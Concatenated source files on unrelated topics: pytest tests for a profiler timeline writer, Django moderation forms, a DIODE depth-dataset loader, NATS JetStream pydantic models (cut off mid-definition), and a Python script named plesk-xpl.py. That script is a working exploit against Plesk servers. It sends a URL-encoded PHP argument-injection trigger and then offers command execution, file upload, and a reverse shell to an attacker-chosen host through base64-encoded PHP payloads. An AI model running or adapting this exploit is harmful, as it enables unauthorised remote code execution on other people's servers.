timeline_writer = TimelineFileWriter(profiler_config_parser=simple_profiler_config_parser)
assert timeline_writer
for i in range(1, 11):
n = "event" + str(i)
timeline_writer.write_trace_events(
training_phase="FileCreationTest", op_name=n, step_num=i, timestamp=time.time()
)
timeline_writer.flush()
timeline_writer.close()
files = []
for path in Path(out_dir + "/" + DEFAULT_PREFIX).rglob("*.json"):
files.append(path)
assert len(files) == 1
file_ts = files[0].name.split("_")[0]
folder_name = files[0].parent.name
assert folder_name == time.strftime(
TRACE_DIRECTORY_FORMAT, time.gmtime(int(file_ts) / CONVERT_TO_MICROSECS)
)
assert folder_name == datetime.strptime(folder_name, TRACE_DIRECTORY_FORMAT).strftime(
TRACE_DIRECTORY_FORMAT
)
with open(files[0]) as timeline_file:
events_dict = json.load(timeline_file)
assert events_dict
def run(rank, profiler_config_parser):
timeline_writer = TimelineFileWriter(profiler_config_parser=profiler_config_parser)
assert timeline_writer
for i in range(1, 6):
n = "event" + str(i)
timeline_writer.write_trace_events(
training_phase="MultiProcessTest",
op_name=n,
step_num=0,
worker=os.getpid(),
process_rank=rank,
timestamp=time.time(),
)
timeline_writer.flush()
timeline_writer.close()
def test_multiprocess_write(simple_profiler_config_parser, out_dir):
"""
This test is meant to test timeline events written multiple processes. Each process or worker, will have its own trace file.
"""
assert simple_profiler_config_parser.profiling_enabled
cpu_count = mp.cpu_count()
processes = []
for rank in range(cpu_count):
p = mp.Process(target=run, args=(rank, simple_profiler_config_parser))
# We first train the model across `num_processes` processes
p.start()
processes.append(p)
for p in processes:
p.join()
files = []
for path in Path(out_dir + "/" + DEFAULT_PREFIX).rglob("*.json"):
files.append(path)
assert len(files) == cpu_count
event_ctr = 0
for file_name in files:
with open(file_name) as timeline_file:
events_dict = json.load(timeline_file)
for e in events_dict:
if e["name"].startswith("event"):
event_ctr += 1
assert event_ctr == cpu_count * 5
def test_duration_events(simple_profiler_config_parser, out_dir):
"""
This test is meant to test duration events. By default, write_trace_events records complete events.
TODO: Make TimelineWriter automatically calculate duration while recording "E" event
"""
assert simple_profiler_config_parser.profiling_enabled
timeline_writer = timeline_writer = TimelineFileWriter(
profiler_config_parser=simple_profiler_config_parser
)
assert timeline_writer
for i in range(1, 11):
n = "event" + str(i)
timeline_writer.write_trace_events(
training_phase="DurationEventTest",
op_name=n,
step_num=i,
phase="B",
timestamp=time.time(),
)
timeline_writer.write_trace_events(
training_phase="DurationEventTest",
op_name=n,
step_num=i,
phase="E",
timestamp=time.time(),
)
timeline_writer.flush()
timeline_writer.close()
files = []
for path in Path(out_dir + "/" + DEFAULT_PREFIX).rglob("*.json"):
files.append(path)
assert len(files) == 1
with open(files[0]) as timeline_file:
events_dict = json.load(timeline_file)
assert events_dict
@pytest.mark.slow
@pytest.mark.parametrize("policy", ["file_size", "file_interval"])
def test_rotation_policy(rotation_profiler_config_parser, policy, out_dir):
"""
This test is meant to test if files are being closed and open correctly according to the 2 rotation policies -
file_size -> close file if it exceeds certain size and open a new file
file_interval -> close file if the file's folder was created before a certain time period and open a new file in a new folder
:param policy: file_size or file_interval
"""
rotation_profiler_config = rotation_profiler_config_parser(policy)
assert rotation_profiler_config.profiling_enabled
timeline_writer = TimelineFileWriter(profiler_config_parser=rotation_profiler_config)
assert timeline_writer
for i in range(1, 100):
n = "event" + str(i)
# adding a sleep here to trigger rotation policy
time.sleep(0.05)
timeline_writer.write_trace_events(
training_phase=f"RotationPolicyTest_{policy}",
op_name=n,
step_num=i,
timestamp=time.time(),
)
timeline_writer.flush()
timeline_writer.close()
files = []
for path in Path(out_dir + "/" + DEFAULT_PREFIX).rglob("*.json"):
files.append(path)
# check if files have been generated
assert files
# count the number of event JSON strings. This is to ensure all events have been written.
# also check if the timestamp of all events in a file are <= filename timestamp
event_ctr = 0
start_time_since_epoch = 0
file_details = []
for file_name in files:
if policy == "file_size":
file_details.append(os.path.getsize(file_name))
else:
file_details.append(os.path.getmtime(file_name))
path = file_name.name.split(DEFAULT_PREFIX)
file_timestamp = int(path[0].split("_")[0])
num_events_in_file = 0
with open(file_name) as timeline_file:
events_dict = json.load(timeline_file)
for e in events_dict:
if "args" in e and "start_time_since_epoch_in_micros" in e["args"]:
start_time_since_epoch = int(e["args"]["start_time_since_epoch_in_micros"])
if "event" in e["name"]:
num_events_in_file += 1
event_ctr += 1
assert (
int(round(e["ts"] + start_time_since_epoch) / CONVERT_TO_MICROSECS)
<= file_timestamp
)
# if rotation occurs too often, there might be only 1 event per file
# the below assertion checks for this
assert num_events_in_file >= 2
if policy == "file_size":
# assuming rotation max file size if 800 bytes, check if all the files are in the
# range +- 60 bytes
assert [pytest.approx(800, 60) == x for x in file_details]
else:
# assuming rotation file close interval is 0.5 seconds, check if the close time
# difference between consecutive files is at least 0.5 seconds
sorted(file_details)
res = [j - i for i, j in zip(file_details[:-1], file_details[1:])]
assert [x >= 0.5 for x in res]
assert event_ctr == 99
@pytest.mark.parametrize("timezone", ["Europe/Dublin", "Australia/Melbourne", "US/Eastern"])
def test_utc_timestamp(monkeypatch, simple_profiler_config_parser, timezone, out_dir):
"""
This test is meant to set to create files/events in different timezones and check if timeline writer stores
them in UTC.
"""
monkeypatch.setenv("TZ", timezone)
assert simple_profiler_config_parser.profiling_enabled
time.tzset()
timeline_writer = TimelineFileWriter(profiler_config_parser=simple_profiler_config_parser)
assert timeline_writer
event_times_in_utc = []
for i in range(1, 3):
event_time_in_timezone = time.mktime(time.localtime())
event_time_in_utc = time_in_utc = calendar.timegm(time.gmtime())
event_times_in_utc.append(event_time_in_utc)
timeline_writer.write_trace_events(
training_phase=f"TimestampTest",
op_name="event_in_" + timezone + str(i),
timestamp=event_time_in_timezone,
duration=20,
)
timeline_writer.flush()
timeline_writer.close()
files = []
for path in Path(out_dir + "/" + DEFAULT_PREFIX).rglob("*.json"):
files.append(path)
file_path = files[0]
path = file_path.name.split(DEFAULT_PREFIX)
file_timestamp = int(path[0].split("_")[0])
# file timestamp uses end of last event
assert (time_in_utc + 20) * CONVERT_TO_MICROSECS == file_timestamp
start_time_since_epoch = 0
idx = 0
for file_name in files:
with open(file_name) as timeline_file:
events_dict = json.load(timeline_file)
for e in events_dict:
if "args" in e and "start_time_since_epoch_in_micros" in e["args"]:
start_time_since_epoch = int(e["args"]["start_time_since_epoch_in_micros"])
if "event" in e["name"]:
assert (
e["ts"] + start_time_since_epoch
== event_times_in_utc[idx] * CONVERT_TO_MICROSECS
)
idx += 1
def test_file_open_fail(file_open_fail_profiler_config_parser):
assert file_open_fail_profiler_config_parser.profiling_enabled
# writing to an invalid path to trigger file open failure
timeline_writer = TimelineFileWriter(
profiler_config_parser=file_open_fail_profiler_config_parser
)
assert timeline_writer
for i in range(1, 5):
n = "event" + str(i)
# Adding a sleep here to slow down event queuing
time.sleep(0.001)
timeline_writer.write_trace_events(
training_phase=f"FileOpenTest", op_name=n, step_num=i, timestamp=time.time()
)
timeline_writer.flush()
timeline_writer.close()
# hacky way to check if the test passes
assert not timeline_writer._worker._healthy
def test_events_far_apart(complete_profiler_config_parser, out_dir):
assert complete_profiler_config_parser.profiling_enabled
timeline_writer = TimelineFileWriter(profiler_config_parser=complete_profiler_config_parser)
assert timeline_writer
event_time_now = time.time()
event_time_after_2hours = event_time_now + 120
timeline_writer.write_trace_events(
training_phase=f"FileOpenTest", op_name="event1", timestamp=event_time_now
)
time.sleep(2)
timeline_writer.write_trace_events(
training_phase=f"FileOpenTest", op_name="event2", timestamp=event_time_after_2hours
)
timeline_writer.flush()
timeline_writer.close()
files = []
for path in Path(out_dir + "/" + DEFAULT_PREFIX).rglob("*.json"):
files.append(path)
# rotate by file_size, gives 4 files - 1 per event
# rotate by file_interval, gives 2 files
assert len(files) == 2
|
<reponame>adam-murray/djangocms-moderation<gh_stars>1-10
from __future__ import unicode_literals
from django import forms
from django.contrib import admin
from django.contrib.admin.widgets import RelatedFieldWidgetWrapper
from django.contrib.auth import get_user_model
from django.forms.forms import NON_FIELD_ERRORS
from django.utils.translation import ugettext, ugettext_lazy as _, ungettext
from adminsortable2.admin import CustomInlineFormSet
from djangocms_versioning.models import Version
from .constants import ACTION_CANCELLED, ACTION_REJECTED, ACTION_RESUBMITTED, COLLECTING
from .helpers import (
get_active_moderation_request,
is_obj_version_unlocked,
is_registered_for_moderation,
)
from .models import (
CollectionComment,
ModerationCollection,
ModerationRequest,
ModerationRequestAction,
RequestComment,
)
class WorkflowStepInlineFormSet(CustomInlineFormSet):
def validate_unique(self):
super().validate_unique()
# The following fixes a bug in Django where it doesn't validate unique constraint
# when the parent model in inline relationship has not been saved
errors = []
unique_check = ("role", "workflow")
selected_roles = []
forms_to_delete = self.deleted_forms
valid_forms = [
form
for form in self.forms
if form.is_valid() and form not in forms_to_delete
]
for form in valid_forms:
selected_role = form.cleaned_data.get("role")
if not selected_role:
continue
if selected_role.pk in selected_roles:
# poke error messages into the right places and mark
# the form as invalid
errors.append(self.get_unique_error_message(unique_check))
form._errors[NON_FIELD_ERRORS] = self.error_class(
[self.get_form_error()]
)
# remove the data from the cleaned_data dict since it was invalid
for field in unique_check:
if field in form.cleaned_data:
del form.cleaned_data[field]
else:
selected_roles.append(selected_role.pk)
class UpdateModerationRequestForm(forms.Form):
moderator = forms.ModelChoiceField(
label=_("moderator"), queryset=get_user_model().objects.none(), required=False
)
message = forms.CharField(
label=_("comment"), required=False, widget=forms.Textarea()
)
def __init__(self, *args, **kwargs):
self.action = kwargs.pop("action")
self.language = kwargs.pop("language")
self.page = kwargs.pop("page")
self.user = kwargs.pop("user")
self.workflow = kwargs.pop("workflow")
self.active_request = kwargs.pop("active_request")
super().__init__(*args, **kwargs)
self.configure_moderator_field()
def configure_moderator_field(self):
# For cancelling and rejecting, we don't need to display a moderator
# field.
if self.action in (ACTION_CANCELLED, ACTION_REJECTED):
self.fields["moderator"].queryset = get_user_model().objects.none()
self.fields["moderator"].widget = forms.HiddenInput()
return
# If the content author is resubmitting the work after a rejected
# moderation request, the next step will be the first one - as it has
# to be approved again from the beginning
if self.action == ACTION_RESUBMITTED:
next_step = self.active_request.workflow.first_step
else:
current_step = self.active_request.user_get_step(self.user)
next_step = current_step.get_next() if current_step else None
if next_step:
next_role = next_step.role
users = next_step.role.get_users_queryset()
self.fields["moderator"].empty_label = ugettext("Any {role}").format(
role=next_role.name
)
self.fields["moderator"].queryset = users.exclude(pk=self.user.pk)
else:
self.fields["moderator"].queryset = get_user_model().objects.none()
self.fields["moderator"].widget = forms.HiddenInput()
def save(self):
self.active_request.update_status(
action=self.action,
by_user=self.user,
to_user=self.cleaned_data.get("moderator"),
message=self.cleaned_data["message"],
)
class CollectionItemsForm(forms.Form):
collection = forms.ModelChoiceField(
queryset=None, required=True # Populated in __init__
)
versions = forms.ModelMultipleChoiceField(
queryset=Version.objects.all(),
required=True,
widget=forms.MultipleHiddenInput(),
)
def __init__(self, user, *args, **kwargs):
super().__init__(*args, **kwargs)
self.user = user
self.fields["collection"].queryset = ModerationCollection.objects.filter(
status=COLLECTING, author=user
)
def set_collection_widget(self, request):
related_modeladmin = admin.site._registry.get(ModerationCollection)
dbfield = ModerationRequest._meta.get_field("collection")
# Django 2.2 requires `remote_field` instead of `rel`.
remote_field = dbfield.rel if hasattr(dbfield, 'rel') else dbfield.remote_field
formfield = self.fields["collection"]
formfield.widget = RelatedFieldWidgetWrapper(
formfield.widget,
remote_field,
admin_site=admin.site,
can_add_related=related_modeladmin.has_add_permission(request),
can_change_related=related_modeladmin.has_change_permission(request),
can_delete_related=related_modeladmin.has_delete_permission(request),
)
def clean_versions(self):
"""
Process objects which are not part of an active moderation request.
Other objects are ignored.
"""
versions = self.cleaned_data["versions"]
eligible_versions = []
for version in versions:
if all(
[
is_registered_for_moderation(version.content),
not get_active_moderation_request(version.content),
is_obj_version_unlocked(version.content, self.user),
]
):
eligible_versions.append(version.pk)
if not eligible_versions:
raise forms.ValidationError(
ungettext(
"Your item is either locked, not enabled for moderation,"
"or is part of another active moderation request",
"Your items are either locked, not enabled for moderation,"
"or are part of another active moderation request",
len(versions),
)
)
return Version.objects.filter(pk__in=eligible_versions)
class SubmitCollectionForModerationForm(forms.Form):
moderator = forms.ModelChoiceField(
label=_("Select review group"),
queryset=get_user_model().objects.none(),
required=False,
)
def __init__(self, *args, **kwargs):
self.collection = kwargs.pop("collection")
self.user = kwargs.pop("user")
super().__init__(*args, **kwargs)
self.configure_moderator_field()
def configure_moderator_field(self):
next_role = self.collection.workflow.first_step.role
users = next_role.get_users_queryset().exclude(pk=self.user.pk)
self.fields["moderator"].empty_label = ugettext("Any {role}").format(
role=next_role.name
)
self.fields["moderator"].queryset = users
def clean(self):
if not self.collection.allow_submit_for_review(user=self.user):
self.add_error(None, _("This collection can't be submitted for a review"))
return super().clean()
def save(self):
self.collection.submit_for_review(
by_user=self.user, to_user=self.cleaned_data.get("moderator")
)
class CancelCollectionForm(forms.Form):
def __init__(self, *args, **kwargs):
self.collection = kwargs.pop("collection")
self.user = kwargs.pop("user")
super().__init__(*args, **kwargs)
def clean(self):
if not self.collection.is_cancellable(self.user):
self.add_error(None, _("This collection can't be cancelled"))
return super().clean()
def save(self):
self.collection.cancel(self.user)
class CollectionCommentForm(forms.ModelForm):
"""
The author and moderation request should be pre-filled and non-editable.
NB: Hidden fields seems to be the only reliable way to do this;
readonly fields do not work for add, only for edit.
"""
class Meta:
model = CollectionComment
fields = "__all__"
widgets = {"author": forms.HiddenInput(), "collection": forms.HiddenInput()}
class RequestCommentForm(forms.ModelForm):
"""
The author and moderation request should be pre-filled and non-editable.
NB: Hidden fields seems to be the only reliable way to do this;
readonly fields do not work for add, only for edit.
"""
class Meta:
model = RequestComment
fields = "__all__"
widgets = {
"author": forms.HiddenInput(),
"moderation_request": forms.HiddenInput(),
}
class ModerationRequestActionInlineForm(forms.ModelForm):
class Meta:
model = ModerationRequestAction
fields = ("message",)
def clean_message(self):
if self.instance and self.cleaned_data["message"] != self.instance.message:
if self.current_user != self.instance.by_user:
raise forms.ValidationError(_("You can only change your own comments"))
return self.cleaned_data["message"]
|
import os.path as osp
from itertools import chain
import json
from torch.utils.data import Dataset
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
'''
The json metadata for DIODE is laid out as follows:
train:
outdoor:
scene_000xx:
scan_00yyy:
- 000xx_00yyy_indoors_300_010
- 000xx_00yyy_indoors_300_020
- 000xx_00yyy_indoors_300_030
scene_000kk:
_analogous_
val:
_analogous_
test:
_analogous_
'''
_VALID_SPLITS = ('train', 'val', 'test')
_VALID_SCENE_TYPES = ('indoors', 'outdoor')
def check_and_tuplize_tokens(tokens, valid_tokens):
if not isinstance(tokens, (tuple, list)):
tokens = (tokens,)
for split in tokens:
assert split in valid_tokens
return tokens
def enumerate_paths(src):
'''flatten out a nested dictionary into an iterable
DIODE metadata is a nested dictionary;
One could easily query a particular scene and scan, but sequentially
enumerating files in a nested dictionary is troublesome. This function
recursively traces out and aggregates the leaves of a tree.
'''
if isinstance(src, list):
return src
elif isinstance(src, dict):
acc = []
for k, v in src.items():
_sub_paths = enumerate_paths(v)
_sub_paths = list(map(lambda x: osp.join(k, x), _sub_paths))
acc.append(_sub_paths)
return list(chain.from_iterable(acc))
else:
raise ValueError('do not accept data type {}'.format(type(src)))
def plot_depth_map(dm, validity_mask):
validity_mask = validity_mask > 0
MIN_DEPTH = 0.5
MAX_DEPTH = min(300, np.percentile(dm, 99))
if MAX_DEPTH < MIN_DEPTH:
whatever = MAX_DEPTH
MAX_DEPTH = MIN_DEPTH
MIN_DEPTH = whatever
dm = np.clip(dm, MIN_DEPTH, MAX_DEPTH)
dm = np.log(dm, where=validity_mask)
dm = np.ma.masked_where(~validity_mask, dm)
cmap = plt.cm.jet
cmap.set_bad(color='black')
plt.imshow(dm, cmap=cmap, vmax=np.log(MAX_DEPTH))
plt.show()
def plot_normal_map(normal_map):
normal_viz = normal_map[:, ::, :]
normal_viz = normal_viz + np.equal(np.sum(normal_viz, 2,
keepdims=True), 0.).astype(np.float32) * np.min(normal_viz)
normal_viz = (normal_viz - np.min(normal_viz)) / 2.
plt.axis('off')
plt.imshow(normal_viz)
class DIODE(Dataset):
def __init__(self, meta_fname, data_root, splits, scene_types):
self.data_root = data_root
self.splits = check_and_tuplize_tokens(
splits, _VALID_SPLITS
)
self.scene_types = check_and_tuplize_tokens(
scene_types, _VALID_SCENE_TYPES
)
with open(meta_fname, 'r') as f:
self.meta = json.load(f)
imgs = []
for split in self.splits:
for scene_type in self.scene_types:
_curr = enumerate_paths(self.meta[split][scene_type])
_curr = map(lambda x: osp.join(split, scene_type, x), _curr)
imgs.extend(list(_curr))
self.imgs = imgs
def __len__(self):
return len(self.imgs)
def __getitem__(self, index):
im = self.imgs[index]
im_fname = osp.join(self.data_root, '{}.png'.format(im))
de_fname = osp.join(self.data_root, '{}_depth.npy'.format(im))
de_mask_fname = osp.join(self.data_root, '{}_depth_mask.npy'.format(im))
im = np.array(Image.open(osp.join(self.data_root, im_fname)))
de = np.load(de_fname).squeeze()
de_mask = np.load(de_mask_fname)
return im, de, de_mask |
<filename>plesk-xpl.py
#!/usr/bin/python
#############################
# ABOUT #
#############################
##########################################################
# Plesk PHP Inject0r Exploit v1.0 #
# Greets to kingcope for finding orig. bug :3 #
# Author: WhoAmi #
# Site: Https://www.youtube.com/c/spynet #
# Notes: This literally took like 10 minutes to port #
##########################################################
#############################
# LIBRARIES #
#############################
import sys, os
import payloads
from payloads import all
import argparse
import requests
import sys
#############################
# HELP #
#############################
help = '''
| Plesk PHP Inject0r EXPLOIT v1.0 |
| Found by : kingcope |
| Coded by : WhoAMi [CLAYTEAM] |
| Contact : <EMAIL> |
'''
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--target",help="Target IP", required=True)
parser.add_argument("--mode ", help="RSH (reverse shell), UP (upload) or SH (inline shell)", default="SH")
parser.add_argument("--lfile", help="File to Upload (full path)")
parser.add_argument("--rfile", help="Where to put the file on the server (full path)")
parser.add_argument("--lhost", help="Host to connect back to", default="127.0.0.1")
parser.add_argument("--lport", help="Port to connect back to", default="4444")
parser.add_argument("--stype", help="Reverse Shell Type - Python or Perl", default="perl")
args = parser.parse_args()
target = args.target
mode = args.mode
localfile = args.lfile
remotefile = args.rfile
lhost = args.lhost
lport = args.lport
stype = args.stype
trigger = "/%70%68%70%70%61%74%68/%70%68%70?"
trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"
trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"
trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"
trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"
trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"
trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"
trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"
trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"
trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"
trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"
trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"
trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"
url = "http://" + target + trigger
def genrshell(lhost, lport, stype):
if stype == "perl":
rshell = payloads.linux.perl.reverse_oneline(lhost, lport)
elif stype == "python":
rshell = payloads.linux.python.reverse_oneline(lhost, lport)
return rshell
def genphp(cmd):
rawphp = """echo "Content-Type:text/html\r\n\r\n"; system('%s');""" %(cmd) # to return results :D
encodedphp = rawphp.encode('base64')
payload = """<?php eval(base64_decode('%s'));die(); ?>""" %(encodedphp) # Create a payload
return payload #return the evil
def genencphp(cmd):
encoded = cmd.encode('base64')
encoded = encoded.strip()
encoded = encoded.replace('\n', '')
encoded = encoded.encode('base64')
encoded = encoded.strip()
encoded = encoded.replace('\n', '') #
raw = """system(base64_decode(base64_decode('%s')));""" %(encoded)
payload = """<?php %s ?>""" %(raw) # Make a bleep bleep
return payload
def test(url): # This whole function is ugly as sin
php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('WhoAmi'); ?>""" # I hope they even md5
WhoAmi = requests.post(url, php) # hahaha no, they dont.
if "9a74152b6df9f65345be1cbede630897" in WhoAmi.text: # hax0r it na0?
print "%s vuln!" %(ip) # yes, this ddos number is wide open
else:
print "%s not vuln" %(ip)
def shell():
while True: # because. infinite win
try: # there is no try, there is only do, and do not...
cmd = raw_input("shell:~$ ")
if cmd == "quit": #rip
print "\n[-] Quitting"
sys.exit(0)
elif cmd == "exit": #rip
print "\n[-] Quitting"
sys.exit(0)
else:
try:
payload = genphp(cmd)
CLAY = requests.post(url, payload)
print CLAY.text
except Exception or KeyboardInterrupt:
print "[-] Exception Caught, I hope"
sys.exit(-5)
except Exception or KeyboardInterrupt:
print "[-] Exception or CTRL+C Caught, I hope"
print "[-] Exiting (hopefully) cleanly..."
sys.exit(0)
def upload(url, localfile, remotefile):
f = open(localfile, "r")
rawfiledata = f.read()
encodedfiledata = rawfiledata.encode('base64')
phppayload = """<?php
$f = fopen("%s", "w");
$x = base64_decode('%s');
fwrite($f, "$x");
fclose($f);
?>""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
print "[+] Uploading File"
requests.post(url, phppayload) # this is why I love the python requests library
print "[+] Upload should be complete"
sys.exit(0)
def rshell():
rshell = genrshell(lhost, lport, stype)
print "[+] Generating Payload"
payload = genencphp(rshell)
print "[+] Sending reverse shell to %s:%s" %(lhost, lport)
requests.post(url, payload) # LoL HaCk3d!
print "[<3] Exiting..."
sys.exit(0)
def main(target, mode): # Some magics
print "[+] Target is: %s" %(target)
if mode == "UP":
upload(url, localfile, remotefile)
elif mode == "SH":
shell()
elif mode == "RSH":
rshell()
else:
print "[-] Mode Invalid... Exit!"
sys.exit(0)
main(target, mode)
|
<filename>src/jsm/models/streams.py
# Copyright 2021 - <NAME>
# Licensed under the Apache License, Version 2.0 (the "License");
# http://www.apache.org/licenses/LICENSE-2.0
from __future__ import annotations
from datetime import datetime
from enum import Enum
from typing import Any, Dict, List, Optional
from pydantic import Field, root_validator, validator
from .base import BaseRequest, BaseResponse, JetstreamModel
from .clusters import Cluster
from .messages import Message
class Retention(str, Enum):
"""How message retention is considered"""
limits = "limits"
interest = "interest"
workqueue = "workqueue"
class Storage(str, Enum):
"""The type of storage backend"""
file = "file"
memory = "memory"
class Discard(str, Enum):
"""Discard policy when a stream reaches it's limits"""
old = "old"
new = "new"
class Placement(JetstreamModel):
"""Placement directives to consider when placing replicas of this stream"""
cluster: str = Field(
...,
description="The desired cluster name to place the stream",
min_length=1,
)
tags: Optional[List[str]] = Field(
None,
description="Tags required on servers hosting this stream",
)
class External(JetstreamModel):
api: str = Field(
...,
description="The subject prefix that imports the other account/domain $JS.API.CONSUMER.> subjects",
)
deliver: Optional[str] = Field(
None, description="The delivery subject to use for the push consumer"
)
class Mirror(JetstreamModel):
"""Placement directives to consider when placing replicas of this stream, random placement when unset"""
name: str = Field(
...,
description="Stream name",
regex=r"^[^.*>]+$",
min_length=1,
)
opt_start_seq: Optional[int] = Field(
None,
description="Sequence to start replicating from",
ge=0,
)
opt_start_time: Optional[str] = Field(
None,
description="Time stamp to start replicating from",
)
filter_subject: Optional[str] = Field(
None,
description="Replicate only a subset of messages based on filter",
)
external: Optional[External] = Field(
None,
description="Configuration referencing a stream source in another account or JetStream domain",
)
class Source(JetstreamModel):
name: str = Field(
...,
description="Stream name",
regex=r"^[^.*>]+$",
min_length=1,
)
opt_start_seq: Optional[int] = Field(
None,
description="Sequence to start replicating from",
ge=0,
)
opt_start_time: Optional[str] = Field(
None,
description="Time stamp to start replicating from",
)
filter_subject: Optional[str] = Field(
None,
description="Replicate only a subset of messages based on filter",
)
external: Optional[External] = Field(
None,
description="Configuration referencing a stream source in another account or JetStream domain",
)
class Config(JetstreamModel):
"""Stream configuration
References:
Streams - [NATS Docs](https://docs.nats.io/jetstream/concepts/streams)
"""
name: Optional[str] = Field(
None,
description="A unique name for the Stream, empty for Stream Templates.",
regex=r"^[^.*>]*$",
min_length=0,
)
subjects: Optional[List[str]] = Field(
None,
description="A list of subjects to consume, supports wildcards. Must be empty when a mirror is configured. May be empty when sources are configured.",
min_length=0,
)
retention: Retention = Field(
...,
description="How messages are retained in the Stream, once this is exceeded old messages are removed.",
)
max_consumers: int = Field(
...,
description="How many Consumers can be defined for a given Stream. -1 for unlimited.",
ge=-1,
)
max_msgs: int = Field(
...,
description="How many messages may be in a Stream, oldest messages will be removed if the Stream exceeds this size. -1 for unlimited.",
ge=-1,
)
max_msgs_per_subject: Optional[int] = Field(
-1,
description="For wildcard streams ensure that for every unique subject this many messages are kept - a per subject retention limit",
ge=-1,
)
max_bytes: int = Field(
...,
description="How big the Stream may be, when the combined stream size exceeds this old messages are removed. -1 for unlimited.",
ge=-1,
)
max_age: int = Field(
...,
description="Maximum age of any message in the stream, expressed in nanoseconds. 0 for unlimited.",
ge=0,
)
max_msg_size: Optional[int] = Field(
-1,
description="The largest message that will be accepted by the Stream. -1 for unlimited.",
ge=-1,
)
storage: Storage = Field(
...,
description="The storage backend to use for the Stream.",
)
num_replicas: int = Field(
...,
description="How many replicas to keep for each message.",
ge=1,
le=5,
)
no_ack: Optional[bool] = Field(
False,
description="Disables acknowledging messages that are received by the Stream.",
)
template_owner: Optional[str] = Field(
None,
description="When the Stream is managed by a Stream Template this identifies the template that manages the Stream.",
)
discard: Optional[Discard] = Field(
"old",
description="When a Stream reach it's limits either old messages are deleted or new ones are denied",
)
duplicate_window: Optional[int] = Field(
0,
description="The time window to track duplicate messages for, expressed in nanoseconds. 0 for default",
ge=0,
)
placement: Optional[Placement] = Field(
None,
description="Placement directives to consider when placing replicas of this stream, random placement when unset",
)
mirror: Optional[Mirror] = Field(
None,
description="Maintains a 1:1 mirror of another stream with name matching this property. When a mirror is configured subjects and sources must be empty.",
)
sources: Optional[List[Source]] = Field(
None,
description="List of Stream names to replicate into this Stream",
)
class DeletedItem(JetstreamModel):
__root__: int = Field(..., ge=0)
class Lost(JetstreamModel):
msgs: Optional[List[int]] = Field(
None,
description="The messages that were lost",
# When field is a list, "ge" constraint is verified for each member
ge=0,
)
bytes: Optional[int] = Field(
None,
description="The number of bytes that were lost",
)
class State(JetstreamModel):
messages: int = Field(
...,
description="Number of messages stored in the Stream",
ge=0,
)
bytes: int = Field(
...,
description="Combined size of all messages in the Stream",
ge=0,
)
first_seq: int = Field(
...,
description="Sequence number of the first message in the Stream",
ge=0,
)
first_ts: Optional[datetime] = Field(
None,
description="The timestamp of the first message in the Stream",
)
last_seq: int = Field(
...,
description="Sequence number of the last message in the Stream",
)
last_ts: Optional[datetime] = Field(
None,
description="The timestamp of the last message in the Stream",
)
deleted: Optional[List[DeletedItem]] = Field(
None,
description="IDs of messages that were deleted using the Message Delete API or Interest based streams removing messages out of order",
)
num_deleted: Optional[int] = Field(
None,
description="The number of deleted messages",
ge=0,
)
lost: Optional[Lost] = Field(
None,
description="Records messages that were damaged and unrecoverable",
)
consumer_count: int = Field(
...,
description="Number of Consumers attached to the Stream",
ge=0,
)
class PubAck(JetstreamModel):
stream: str = Field(..., description="Name of the stream")
seq: int = Field(..., description="Sequence of the message in the steam")
domain: Optional[str] = Field(
None, description="JetStream domain which acknowledged the message"
)
duplicate: Optional[bool] = None
class IoNatsJetstreamApiV1StreamItem(JetstreamModel):
config: Config = Field(
...,
description="The active configuration for the Stream",
)
state: State = Field(
...,
description="Detail about the current State of the Stream",
)
created: str = Field(
...,
description="Timestamp when the stream was created",
)
mirror: Optional[Mirror] = Field(
None, description="Information about an upstream stream source in a mirror"
)
sources: Optional[List[Source]] = Field(
None, description="Streams being sourced into this Stream"
)
cluster: Optional[Cluster] = None
class IoNatsJetstreamApiV1StreamCreateResponse(
IoNatsJetstreamApiV1StreamItem, BaseResponse
):
pass
class IoNatsJetstreamApiV1StreamInfoResponse(
IoNatsJetstreamApiV1StreamItem, BaseResponse
):
pass
class IoNatsJetstreamApiV1StreamUpdateResponse(
IoNatsJetstreamApiV1StreamItem, BaseResponse
):
pass
class IoNatsJetstreamApiV1StreamListResponse(BaseResponse):
total: int = Field(
...,
description="Total number of streams without regard to offset or limit",
ge=0,
)
offset: int = Field(
...,
description="Number of streams to skip",
ge=0,
)
limit: int = Field(
...,
description="Maximum number of streams to return",
ge=0,
)
streams: List[IoNatsJetstreamApiV1StreamItem] = Field(
[],
description="A list of streams",
)
class IoNatsJetstreamApiV1StreamNamesResponse(BaseResponse):
total: int = Field(
...,
description="Total number of streams without regard to offset or limit",
ge=0,
)
offset: int = Field(
...,
description="Number of streams to skip",
ge=0,
)
limit: int = Field(
...,
description="Maximum number of streams to return",
ge=0,
)
streams: List[str] = Field(
[],
description="A list of stream names",
)
@validator("streams", always=True, pre=True)
def ensure_streams(cls, v: Any) -> Any:
if v is None:
return []
return v
class IoNatsJetstreamApiV1StreamDeleteResponse(BaseResponse):
success: bool
class IoNatsJetstreamApiV1StreamMsgGetResponse(BaseResponse):
message: Message
class IoNatsJetstreamApiV1StreamMsgDeleteResponse(BaseResponse):
success: bool
class IoNatsJetstreamApiV1StreamPurgeResponse(BaseResponse):
success: bool
purged: int = Field(
...,
description="Number of messages purged from the Stream",
ge=0,
)
class IoNatsJetstreamApiV1StreamSnapshotResponse(BaseResponse):
config: Config
state: State
class CreateRequestConfig(JetstreamModel):
name: Optional[str] = Field(
None,
description="A unique name for the Stream, empty for Stream Templates.",
regex=r"^[^.*>]*$",
min_length=0,
)
subjects: Optional[List[str]] = Field(
None,
description="A list of subjects to consume, supports wildcards. Must be empty when a mirror is configured. May be empty when sources are configured.",
min_length=0,
)
retention: Retention = Field(
...,
